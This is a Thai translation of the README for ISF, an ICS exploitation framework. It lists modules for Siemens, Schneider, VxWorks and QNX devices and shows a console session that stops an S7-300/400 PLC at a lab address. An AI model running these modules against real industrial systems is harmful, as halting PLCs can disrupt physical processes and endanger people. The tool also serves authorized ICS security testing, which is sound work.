ไอเอสเอฟ
ve release
ISF (Industrial Exploitation Framework) เป็นเฟรมเวิร์กการหาประโยชน์ที่ใช้ Python ซึ่งคล้ายกับเฟรมเวิร์ก metasploit
ISF ขึ้นอยู่กับโปรเจ็กต์โอเพ่นซอร์สของเราเตอร์สเปลต
อ่านสิ่งนี้ในภาษาอื่น: อังกฤษ, 简体中文,
การใช้ ISF เพื่อโจมตีเป้าหมายโดยไม่ได้รับความยินยอมร่วมกันล่วงหน้าถือเป็นสิ่งผิดกฎหมาย เป็นความรับผิดชอบของผู้ใช้ที่จะต้องปฏิบัติตามกฎหมายท้องถิ่น รัฐ และรัฐบาลกลางที่เกี่ยวข้องทั้งหมด นักพัฒนาจะไม่รับผิดและไม่รับผิดชอบต่อการใช้งานในทางที่ผิดหรือความเสียหายที่เกิดจากโปรแกรมนี้
| ชื่อ | เส้นทาง | คำอธิบาย |
|---|---|---|
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | ไคลเอ็นต์ Modbus-TCP |
| wdb2_client | icssploit/clients/wdb2_client.py | ไคลเอ็นต์ WdbRPC เวอร์ชัน 2 (Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | ไคลเอ็นต์ s7comm (S7 300/400 PLC) |
| ชื่อ | เส้นทาง | คำอธิบาย |
|---|---|---|
| s7_300_400_plc_control | หาประโยชน์/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC เริ่ม/หยุด |
| s7_1200_plc_control | หาประโยชน์/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC เริ่ม/หยุด/รีเซ็ต |
| vxworks_rpc_dos | หาประโยชน์/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC ระยะไกล (CVE-2015-7599) |
| quantum_140_plc_control | หาประโยชน์/plcs/schneider/quantum_140_plc_control.py | การเริ่ม/หยุด PLC ของ Schneider Quantum 140 series |
| Crash_qnx_inetd_tcp_service | หาประโยชน์/plcs/qnx/crash_qnx_inetd_tcp_service.py | บริการ QNX Inetd TCP |
| qconn_remote_exec | หาประโยชน์/plcs/qnx/qconn_remote_exec.py | การเรียกใช้โค้ดระยะไกล QNX qconn |
| profinet_set_ip | หาประโยชน์/plcs/siemens/profinet_set_ip.py | การกำหนดค่า IP ของอุปกรณ์ Profinet DCP |
| ชื่อ | เส้นทาง | คำอธิบาย |
|---|---|---|
| profinet_dcp_scan | สแกนเนอร์/profinet_dcp_scan.py | เครื่องสแกน Profinet DCP |
| vxworks_6_scan | สแกนเนอร์/vxworks_6_scan.py | เครื่องสแกน Vxworks 6.x |
| s7comm_scan | สแกนเนอร์/s7comm_scan.py | เครื่องสแกน S7comm |
| enip_scan | สแกนเนอร์/enip_scan.py | เครื่องสแกน EthernetIP |
โปรโตคอลเหล่านี้สามารถใช้ใน Fuzzing Framework อื่นๆ เช่น Kitty หรือสร้างไคลเอ็นต์ของคุณเองได้
| ชื่อ | เส้นทาง | คำอธิบาย |
|---|---|---|
| pn_dcp | icssploit/โปรโตคอล/pn_dcp | โปรโตคอล Profinet DCP |
| modbus_tcp | icssploit/โปรโตคอล/modbus_tcp | โปรโตคอล Modbus TCP |
| wdbrpc2 | icssploit/โปรโตคอล/wdbrpc2 | โปรโตคอล WDB RPC เวอร์ชัน 2 |
| s7comm | icssploit/โปรโตคอล/s7comm.py | โปรโตคอล S7comm |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
คุณสามารถใช้ปุ่ม Tab เพื่อดำเนินการให้เสร็จสิ้นได้
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >
